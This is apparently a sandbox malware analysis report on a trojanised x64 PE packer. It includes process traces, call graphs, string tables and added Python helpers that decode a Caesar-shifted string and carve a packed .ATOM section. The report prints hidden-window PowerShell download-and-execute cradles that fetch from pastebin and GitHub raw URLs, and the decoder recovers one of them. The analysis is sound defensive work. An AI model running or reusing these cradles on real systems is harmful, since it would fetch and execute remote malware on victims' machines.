                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:09:54:35
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:09:54:36
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:09:54:36
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                        Imagebase:0x7ff7207d0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:4.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:47.7%
                                                                                          Total number of Nodes:237
                                                                                          Total number of Limit Nodes:4
1866 7ff674c51476 __stdio_common_vsprintf 1866->1805 1868 7ff674c5298c 1867->1868 1868->1818 1870 7ff674c52a95 1869->1870 1874 7ff674c51b00 1870->1874 1908 7ff674c56ce0 1870->1908 1872 7ff674c52b1a 1872->1874 1912 7ff674c56ed0 1872->1912 1874->1824 1874->1825 1876 7ff674c52a51 1875->1876 1878 7ff674c52a1e 1875->1878 1876->1823 1877 7ff674c52a3b free 1877->1823 1878->1876 1878->1877 1880 7ff674c51138 GetFileSize 1879->1880 1881 7ff674c513ad 1879->1881 1882 7ff674c5115c CreateFileMappingW MapViewOfFile 1880->1882 1883 7ff674c513a2 CloseHandle 1880->1883 1884 7ff674c51c00 8 API calls 1881->1884 1885 7ff674c511c7 1882->1885 1886 7ff674c511b3 CloseHandle 1882->1886 1883->1881 1887 7ff674c513cf 1884->1887 1885->1883 1888 7ff674c511d0 UnmapViewOfFile 1885->1888 1886->1885 1887->1838 1887->1839 1889 7ff674c511e2 CloseHandle 1888->1889 1890 7ff674c511ef CreateFileMappingW MapViewOfFile 1888->1890 1889->1890 1891 7ff674c51264 1890->1891 1892 7ff674c51250 CloseHandle 1890->1892 1891->1883 1893 7ff674c5126d 1891->1893 1892->1891 1893->1893 1894 7ff674c512e9 memmove memmove UnmapViewOfFile 1893->1894 1895 7ff674c5138a CloseHandle 1894->1895 1896 7ff674c51397 CloseHandle 1894->1896 1895->1896 1896->1881 1898 7ff674c51c09 1897->1898 1899 7ff674c51bc0 1898->1899 1900 7ff674c51ec8 IsProcessorFeaturePresent 1898->1900 1899->1841 1901 7ff674c51ee0 1900->1901 1927 7ff674c51f9c RtlCaptureContext 1901->1927 1906->1851 1907->1866 1909 7ff674c56ced 1908->1909 1910 7ff674c56d91 memset 1909->1910 1911 7ff674c56db3 1909->1911 1910->1909 1911->1872 1913 7ff674c56eff 1912->1913 1917 7ff674c56f65 1913->1917 1918 7ff674c562b0 1913->1918 1915 7ff674c562b0 memmove 1916 7ff674c56f13 1915->1916 1916->1915 1916->1917 1917->1874 1920 7ff674c562d5 1918->1920 1921 7ff674c56394 1920->1921 1922 7ff674c53ac0 1920->1922 1921->1916 1923 7ff674c53aea 1922->1923 1926 7ff674c53b1c 1922->1926 1923->1920 1924 7ff674c543be memmove 1924->1926 1925 7ff674c53d9f 1925->1920 1926->1924 1926->1925 1928 7ff674c51fb6 
RtlLookupFunctionEntry 1927->1928 1929 7ff674c51fcc RtlVirtualUnwind 1928->1929 1930 7ff674c51ef3 1928->1930 1929->1928 1929->1930 1931 7ff674c51e94 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1930->1931 1955 7ff674c51e80 1958 7ff674c52250 1955->1958 1959 7ff674c51e89 1958->1959 1960 7ff674c52273 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1958->1960 1960->1959 1961 7ff674c57e80 1962 7ff674c57e9d 1961->1962 1965 7ff674c57ec6 1961->1965 1963 7ff674c57eb9 1962->1963 1964 7ff674c58a30 memmove 1962->1964 1964->1963 1966 7ff674c57fcf 1965->1966 1969 7ff674c57f80 1965->1969 1967 7ff674c57fc8 1966->1967 1968 7ff674c58a30 memmove 1966->1968 1968->1967 1969->1967 1970 7ff674c58a30 memmove 1969->1970 1970->1967 2017 7ff674c51c20 2018 7ff674c51c30 2017->2018 2030 7ff674c52088 2018->2030 2020 7ff674c52370 9 API calls 2021 7ff674c51cd5 2020->2021 2022 7ff674c51c54 _RTC_Initialize 2027 7ff674c51cb7 2022->2027 2038 7ff674c52310 InitializeSListHead 2022->2038 2027->2020 2029 7ff674c51cc5 2027->2029 2031 7ff674c52099 2030->2031 2032 7ff674c520cb 2030->2032 2033 7ff674c52108 2031->2033 2036 7ff674c5209e __scrt_release_startup_lock 2031->2036 2032->2022 2034 7ff674c52370 9 API calls 2033->2034 2035 7ff674c52112 2034->2035 2036->2032 2037 7ff674c520bb _initialize_onexit_table 2036->2037 2037->2032

                                                                                          Callgraph

                                                                                          Callgraph (rendered graph omitted): 122 functions, Function_00007FF674C51000 through Function_00007FF674C59396. The entry Function_00007FF674C51C20 fans out to the CRT initialisation routines (Function_00007FF674C52088, Function_00007FF674C52370, Function_00007FF674C52580 and the small Function_00007FF674C523xx helpers). Function_00007FF674C51D04 calls Function_00007FF674C51530, the routine whose control-flow graph and strings follow; that routine in turn calls Function_00007FF674C513F0 (printf wrapper), Function_00007FF674C51450 (vsprintf wrapper), Function_00007FF674C514B0, Function_00007FF674C510E0 (file mapping; the .ATOM string belongs to it), Function_00007FF674C52960, Function_00007FF674C529C0, Function_00007FF674C52A10, Function_00007FF674C52A60 and Function_00007FF674C51C00. Function_00007FF674C52A60 leads into Function_00007FF674C56CE0 and Function_00007FF674C56ED0, then Function_00007FF674C562B0 and Function_00007FF674C53AC0, the memset/memmove-heavy helpers that run between the input read and the section append.

                                                                                          Control-flow Graph

                                                                                          Control-flow graph of 7ff674c51530 (rendered graph omitted). Basic blocks that call APIs or internal routines, in the order the graph connects them: 7ff674c51619 malloc → byte-wise loops 7ff674c51640–7ff674c516de → 7ff674c516e0 WinExec, free, strrchr → argument handling 7ff674c51707–7ff674c517a3, with printf (7ff674c513f0) on the usage branch 7ff674c51714 → 7ff674c517a7 printf, CreateFileA → on failure 7ff674c517eb GetLastError, printf; on success 7ff674c5180c GetFileSize, malloc, call 7ff674c59247, ReadFile → on failure 7ff674c51852 GetLastError, printf; on success 7ff674c51873 CloseHandle → 7ff674c51891 and 7ff674c518a2 call 7ff674c514b0 → 7ff674c518cd, 7ff674c51956 or 7ff674c519b2 printf and 7ff674c51450 → 7ff674c5190d CopyFileA (on failure 7ff674c51925 GetLastError, printf) → 7ff674c51a1a printf, CreateFileA → 7ff674c51a66 printf ×2, call 7ff674c52960, call 7ff674c529c0 → 7ff674c51abb call 7ff674c52a60 → 7ff674c51b10 free → either 7ff674c51b16 call 7ff674c52a10, printf, or 7ff674c51b32 call 7ff674c52a10, printf ×3, call 7ff674c510e0 → 7ff674c51b90 printf → 7ff674c51ba7 printf → 7ff674c51bb1 call 7ff674c51c00. Every path from the entry block reaches the WinExec block 7ff674c516e0 before the argument handling and before the first CreateFileA, so the command is executed regardless of how the tool is invoked.
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2322250521.00007FF674C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674C50000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2322205653.00007FF674C50000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.2322278453.00007FF674C5A000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.2322300128.00007FF674C5D000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff674c50000_OSLdZanXNc.jbxd
                                                                                          Similarity
                                                                                          • API ID: printf$File$ErrorLastmalloc$Createfree$CloseCopyExecHandleReadSize__acrt_iob_func__stdio_common_vfprintfmemsetstrrchr
                                                                                          • String ID (one string per line; the report joins them with "$"):
                                                                                              [ DONE ] 
                                                                                              %s%s
                                                                                              .\DllPP64Stub.dll
                                                                                              .\H_PP64Stub.exe
                                                                                              .\unpacker.exe
                                                                                              CopyFileA
                                                                                              CreateFileA
                                                                                              DllPP64Stub.dll
                                                                                              H_PP64Stub.exe
                                                                                              ReadFile
                                                                                              [!] Compression Failed With Error : %d 
                                                                                              [!] "%s" [ FAILED ] %d 
                                                                                              [!] Failed To Create A New Section 
                                                                                              [#] Output : 
                                                                                              [#] Usage : %s <Input x64 exe> <*Output*>
                                                                                              [+] Compressed Ratio : %d%% 
                                                                                              [+] Final Pe Size : %d 
                                                                                              [+] Section .ATOM is Created Containing The Input Packed Pe 
                                                                                              [i] "%s" Is Invalid Input, Defaulting To Outputting Exe File ... 
                                                                                              [i] 32-PE Input Detected ... [ NOT-SUPPORTED ]
                                                                                              [i] 64-PE Input Detected ... [ SUPPORTED ]
                                                                                              [i] Generating Dll Output ... 
                                                                                              [i] Generating Exe Output ... 
                                                                                              [i] Generating No Console Exe Output ... 
                                                                                              [i] Packing ... 
                                                                                              [i] Reading " %s " ... 
                                                                                              [i] Reading The Loader "%s" ...
                                                                                              hell.e
                                                                                              hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/Qhwk3Q/qd9rz3495udbjzl4jbukxdzhudzhud/uhiv/khdgv/pdlq/fu_dvp_fubswhu.waw -xvhedvlfsduvlqj)}
                                                                                              powers
                                                                                              stublocation\
                                                                                              unpacker.exe
                                                                                          • API String ID: 2980077734-226719752
                                                                                          • Opcode ID: d4229d7a5b8b2fd300928cd97432b2d28f53d1bd187f2e038fd3ea97fb56186e
                                                                                          • Instruction ID: c1c55b191a348592d2d392dcaf49088790348aff03ea886a6ba7f275518ad402
                                                                                          • Opcode Fuzzy Hash: d4229d7a5b8b2fd300928cd97432b2d28f53d1bd187f2e038fd3ea97fb56186e
                                                                                          • Instruction Fuzzy Hash: B1127E23E28A82C5EB109B25A8DC2BDA7B0FB55794F684133D94EC26A5DF3DE5C5C700
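The string table of this routine carries one entry that is not plain text: the fragment beginning `hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/...`. Every letter in it is shifted forward by 3 in the alphabet while digits, punctuation and whitespace are left alone; shifting back gives `ell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}`. Read next to the plain fragments `powers` and `hell.e` in the same table and the WinExec import in this routine's API list, that points at a hidden-window PowerShell download-and-execute cradle. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox. It brute-forces all 26 rotations and ranks them by tokens a PowerShell cradle is likely to contain, so it does not need the shift in advance, and it pulls out the host and path the cradle fetches. The obfuscated input is copied from the String ID list; the ranking token list is the only assumption.

```python
"""Recover the shift-3 (Caesar) string from the sample's string table.

Added example for this report, not code from the sample or from Joe Sandbox.
The only input is the obfuscated fragment copied from the String ID list.
"""
import re

# Copied verbatim from the report's string table (the entry after "hell.e").
OBFUSCATED = (
    "hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/Qhwk3Q/"
    "qd9rz3495udbjzl4jbukxdzhudzhud/uhiv/khdgv/pdlq/fu_dvp_fubswhu.waw "
    "-xvhedvlfsduvlqj)}"
)

# Assumed tokens a decoded PowerShell download cradle tends to contain. They are
# used only to rank candidate shifts, so a bad guess costs recall, not correctness.
CRADLE_TOKENS = ("iex", "iwr", "invoke-", "downloadstring", "http", ".com", "windowstyle")


def caesar(text: str, shift: int) -> str:
    """Rotate ASCII letters by `shift` positions (mod 26), preserving case.

    Digits, punctuation and whitespace pass through unchanged, which is the
    scheme the sample's string shows: the '3' in 'Qhwk3Q' and the '/' and '.'
    separators survive unshifted."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def find_shift(text: str, tokens=CRADLE_TOKENS) -> int:
    """Try all 26 rotations and return the one whose output contains the most
    expected tokens. A Caesar cipher's whole key space is 26 values, so nothing
    about the shift has to be known up front."""
    def score(k: int) -> int:
        candidate = caesar(text, k).lower()
        return sum(tok in candidate for tok in tokens)
    return max(range(26), key=score)


def decode_sample_string() -> str:
    """Decode the report's string with the rotation recovered by find_shift()."""
    return caesar(OBFUSCATED, find_shift(OBFUSCATED))


def extract_download_target(decoded: str):
    """Return the host/path the cradle fetches (the sample writes it without a
    scheme), or None when nothing URL-like is present."""
    m = re.search(r"\b[A-Za-z0-9.-]+\.[A-Za-z]{2,}/[^\s)}\]]+", decoded)
    return m.group(0) if m else None


if __name__ == "__main__":
    rotation = find_shift(OBFUSCATED)
    decoded = decode_sample_string()
    print(f"decode rotation = {rotation} (i.e. the sample encoded with +{(-rotation) % 26})")
    print(decoded)
    print("fetches:", extract_download_target(decoded))
```

Run as a script it prints the recovered rotation (23, i.e. the sample encoded with +3), the decoded command line and the fetched host/path. For another sample, paste the suspect string into OBFUSCATED; if the ranking ties or picks the wrong rotation, extend CRADLE_TOKENS with words the expected plaintext must contain.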

                                                                                          Similarity
                                                                                          • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                                          • String ID:
                                                                                          • API String ID: 1133592946-0
                                                                                          • Opcode ID: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                                          • Instruction ID: 99d6d9db286bc379e009742c4a5067b314fb2c970d1aa6f8a8ddbdb261a3bf38
                                                                                          • Opcode Fuzzy Hash: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                                          • Instruction Fuzzy Hash: E7314E23E2C203C1FA14AB61A8DD3BDA3B1AF46784F680476D64DC72D3DE6DA8C4C651

                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$View$CreateMappingUnmapmemmove$Size
                                                                                          • String ID: .ATOM$@
                                                                                          • API String ID: 446061512-930667443
                                                                                          • Opcode ID: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                                          • Instruction ID: f6c6fcb9b4733dedb4f1a00da95b009eed3fbdbd17dc13dda92f5ba2a36af8a0
                                                                                          • Opcode Fuzzy Hash: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                                          • Instruction Fuzzy Hash: E0815033A29A41C6E750CF21E88866DB7B0FB89B54F145236DA9E83B94DF3CE595C700
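This record (CreateFileMappingW, MapViewOfFile, memmove, UnmapViewOfFile, the `.ATOM` string) is the routine that the packer's own messages describe: "Section .ATOM is Created Containing The Input Packed Pe" and "Failed To Create A New Section". To recover the packed payload from a file this tool produced, an analyst first has to carve that section out of the output PE. The section-table walker below is an added example for this report, not code from the sample or its author: it parses the MZ/PE headers, locates a section by name and returns its raw bytes, clamping a SizeOfRawData that overruns the file instead of trusting it. The PE it runs on is constructed inline (a .text stub plus an .ATOM section; header values are placeholders, not taken from the sample). The report does not identify the compression the packer uses, so decompressing the carved bytes is outside what this example can show.

```python
"""Carve a named section (here .ATOM) out of a PE file.

Added example for this report, not code from the sample or its author. The
packer's strings say the packed input PE is written into a new section named
.ATOM; this walks the section table of any PE and returns that section's raw
bytes. The PE it is demonstrated on is constructed inline and is not the sample.
"""
import struct

SECTION_HEADER_FMT = "<8sIIIIIIHHI"            # IMAGE_SECTION_HEADER, 40 bytes
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)


def is_pe(data: bytes) -> bool:
    """True when `data` starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0" and e_lfanew + 24 <= len(data)


def section_headers(pe: bytes):
    """Yield (name, virtual_size, virtual_address, raw_size, raw_ptr, characteristics)
    for every section header, staying inside the file."""
    if not is_pe(pe):
        raise ValueError("not a PE image")
    coff = struct.unpack_from("<I", pe, 0x3C)[0] + 4       # COFF header follows 'PE\0\0'
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_of_optional
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        if off + SECTION_HEADER_SIZE > len(pe):
            raise ValueError("section table runs past end of file")
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(SECTION_HEADER_FMT, pe, off)
        yield name.rstrip(b"\0"), vsize, va, rsize, rptr, chars


def section_names(pe: bytes):
    return [h[0] for h in section_headers(pe)]


def find_section(pe: bytes, name: bytes):
    """Return (raw_ptr, raw_size, virtual_address) of section `name`, or None."""
    for sname, _vsize, va, rsize, rptr, _chars in section_headers(pe):
        if sname == name:
            return rptr, rsize, va
    return None


def extract_section(pe: bytes, name: bytes):
    """Return the on-disk bytes of section `name` (None if absent). SizeOfRawData
    is attacker-controlled, so the slice is clamped to the file length."""
    hit = find_section(pe, name)
    if hit is None:
        return None
    rptr, rsize, _va = hit
    return pe[rptr:min(rptr + rsize, len(pe))]


def build_sample_pe(atom_payload: bytes) -> bytes:
    """Constructed PE32+ image for the demo: a .text stub and an .ATOM section
    carrying `atom_payload`. Header values are plausible placeholders only."""
    file_align, opt_size = 0x200, 0xF0
    text_raw = file_align
    atom_raw = text_raw + file_align
    atom_size = -(-len(atom_payload) // file_align) * file_align    # round up to alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)                             # PE32+ magic

    def hdr(name, vsize, va, rsize, rptr, chars):
        return struct.pack(SECTION_HEADER_FMT, name, vsize, va, rsize, rptr, 0, 0, 0, 0, chars)

    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    headers += hdr(b".text", 0x10, 0x1000, file_align, text_raw, 0x60000020)
    headers += hdr(b".ATOM", len(atom_payload), 0x2000, atom_size, atom_raw, 0x40000040)
    image = bytearray(atom_raw + atom_size)
    image[:len(headers)] = headers
    image[text_raw] = 0xC3                                            # ret
    image[atom_raw:atom_raw + len(atom_payload)] = atom_payload
    return bytes(image)


if __name__ == "__main__":
    sample = build_sample_pe(b"PACKED-PAYLOAD")
    print(section_names(sample))
    print(find_section(sample, b".ATOM"))
    print(extract_section(sample, b".ATOM")[:14])
```

To use it on a real output of this packer, read the file into `pe` and call `extract_section(pe, b".ATOM")`; the section's VirtualSize (third field from `section_headers`) is usually the better length to keep than the file-aligned SizeOfRawData.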

                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 313767242-0
                                                                                          • Opcode ID: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                                          • Instruction ID: cac454aa2ae7ad337fe0a0d698b279ce79ac01439e5d979ddda708960c01a60c
                                                                                          • Opcode Fuzzy Hash: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                                          • Instruction Fuzzy Hash: 84310C73624B81CAEB608F61E8847AEB3B5FB84744F54403ADA4E87B95DF38D588C710

                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                                          • Instruction ID: 627e2e9df5593c867cb42d704801ca847c1bae86e367b81d3d11c09491ee5ab3
                                                                                          • Opcode Fuzzy Hash: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                                          • Instruction Fuzzy Hash: 4B111826B24B05CAEB008F61E8982BD73B4FB59758F540E32DA6D867A4DF78D198C340
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                                          • Instruction ID: 1866a241c7c4fa1d7b95887e563c6653da10c883632f45bab93cd1d0d38c5ed1
                                                                                          • Opcode Fuzzy Hash: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                                          • Instruction Fuzzy Hash: 72E2BDB3B246918BE715CF28D0847AC77B5F794B4CF204236DB0A97B48DE39A985CB44

Control-flow Graph

APIs
• printf.MSPDB140-MSVCRT ref: 00007FF674C514CD
  • Part of subcall function 00007FF674C513F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674C51418
  • Part of subcall function 00007FF674C513F0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674C51437
Strings
Similarity
• API ID: __acrt_iob_func__stdio_common_vfprintfprintf
• String ID: [!] Please Input A Valid x64 Pe File !$[!] We Do Not Support Dll Files !$[!] We Do Not Support x32 Exe Files, Yet !
• API String ID: 115429112-3694449406
Memory Dump Source
• Source File: 00000004.00000002.2603539386.00007FFE16620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffe16620000_powershell.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2604048282.00007FFE166F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE166F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffe166f0000_powershell.jbxd
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1@_L$80"$80"
                                                                                          • API String ID: 0-3479483465
                                                                                          • Opcode ID: be3a27c168c09a1dd93219aaa3a88f5a526868afd3a0bff859345a33f696b1c9
                                                                                          • Instruction ID: 8f0ccd1163c2427333dd35c5f34c904d4273e972fe10de3251720d7d3667e3a4
                                                                                          • Opcode Fuzzy Hash: be3a27c168c09a1dd93219aaa3a88f5a526868afd3a0bff859345a33f696b1c9
                                                                                          • Instruction Fuzzy Hash: 5E21A571209A449FC71DEF28E06B9697BE0EF65304710459ED087CF272DA32A946CB84
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: 1ec5ff92404baa2a45cc771f192464ad9c1303e12fc4a7c830b946422d427a99
                                                                                          • Instruction ID: 02296c3e73aeb425ad23c6bd867a47223b72a542b2e064a3f1a4097731f8a20a
                                                                                          • Opcode Fuzzy Hash: 1ec5ff92404baa2a45cc771f192464ad9c1303e12fc4a7c830b946422d427a99
                                                                                          • Instruction Fuzzy Hash: FA31E87120EB449FCB1DEF38E06A9697BA0EF6630471005CDD087CF272CA329549CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: 50035e156ea48d44b077d21d1e738cbc72221ad1187db1f27a26bc19a8d333b8
                                                                                          • Instruction ID: be12628d13ee48f77a2128dd69d439587ccb6d9b9b812b0379be6345c35987fa
                                                                                          • Opcode Fuzzy Hash: 50035e156ea48d44b077d21d1e738cbc72221ad1187db1f27a26bc19a8d333b8
                                                                                          • Instruction Fuzzy Hash: C221A571209B449FC71DAF38E06B9657BE0EF65708710459DD087CB272DA32A546CB45
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 80"$80"
                                                                                          • API String ID: 0-2073002175
                                                                                          • Opcode ID: b638d63643509a14c83cc5562ab62cd74bd16848016f95dc8dce7e849b369b1b
                                                                                          • Instruction ID: f3122bb1ebafedd9db9c91a2155657012ea4449b072118b6bd654f8f4325a32a
                                                                                          • Opcode Fuzzy Hash: b638d63643509a14c83cc5562ab62cd74bd16848016f95dc8dce7e849b369b1b
                                                                                          • Instruction Fuzzy Hash: 2F11B47120EA449FC71DEF38E42F9697BE0EF55314710499DD087CB272DA32A945CB84
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2822016158.00007FFE16640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16640000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16640000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e794b03c83db380118aecd4ca34316c4d2da315b10257bf801414b24c4aeb346
                                                                                          • Instruction ID: c3c28a2c5061f87a63d11967321dc723ac383600a9bdf29cd8af4047d636c219
                                                                                          • Opcode Fuzzy Hash: e794b03c83db380118aecd4ca34316c4d2da315b10257bf801414b24c4aeb346
                                                                                          • Instruction Fuzzy Hash: FA01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.2823270461.00007FFE16710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE16710000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_7ffe16710000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19a2d29e01c69937370cffdb14be1d80b3851fe12b2816b6a43b2b21fda91370
                                                                                          • Instruction ID: eb5011826f21b6a0b460e23e23f5b1551e39d8bdea3837a262f5910665fac353
                                                                                          • Opcode Fuzzy Hash: 19a2d29e01c69937370cffdb14be1d80b3851fe12b2816b6a43b2b21fda91370
                                                                                          • Instruction Fuzzy Hash: 07F0A033D0DAD84FEB62E768581A1DCFBF0EF19234B1801FFC448D61A2DA2968498740